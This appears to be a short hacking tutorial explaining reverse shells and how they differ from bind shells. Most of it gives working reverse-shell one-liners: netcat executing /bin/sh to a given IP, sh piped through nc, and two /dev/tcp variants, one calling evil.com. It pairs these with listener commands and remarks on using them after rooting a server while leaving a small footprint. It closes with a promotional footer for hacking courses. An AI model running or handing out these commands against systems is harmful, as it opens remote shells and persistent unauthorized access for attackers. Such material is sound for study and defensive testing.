Reverse shells are useful for issuing commands to a remote client when the client is behind something such as a NAT. You might say, "But can't a normal shell or simple SSH tunnel do the same thing?". No, it can't. All over the internet I see a lot of confusion regarding the difference between a normal shell and a reverse shell. Let's clear this up before we get started.
- A reverse shell works by the remote computer sending its shell to a specific user, rather than binding it to a port, which would be unreachable in many circumstances. This allows root commands over the remote server.
- A bind shell is when a user uses BASH and binds a shell to a local port that anyone can issue commands to on the local network.
Reverse shells are also commonly used for nefarious purposes, like after a hacker roots a server, they will likely make a reverse shell so they have easy access to the computer for future use. Let's take a look at a few ways we could make one on an example remote computer. I trust it is one that you haven't used.
- Remote Unix host
- netcat installed from your package repository
When shelled in to the remote host, simply issue the following command to send the shell back home:
nc -c /bin/sh <your IP> <any unfiltered port>
You could even pipe BASH through netcat.
/bin/sh | nc <your IP> <any unfiltered port>
Then listen for the shell:
nc -l -p <same unfiltered port> -vvv
This technique is for when netcat isn't available on the remote machine and when you want to leave a small footprint when you're doing things of a questionable nature.
Listen for the shell:
nc -l -p <any unfiltered port> -vvv
Now create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.
exec 5<>/dev/tcp/evil.com/<same unfiltered port> $ cat <&5 | while read line; do $line 2>&5 >&5; done
Or another reverse shell:
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
Then, simply send raw commands through netcat.
Be a Part of Null Byte!
Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.
Other worthwhile deals to check out: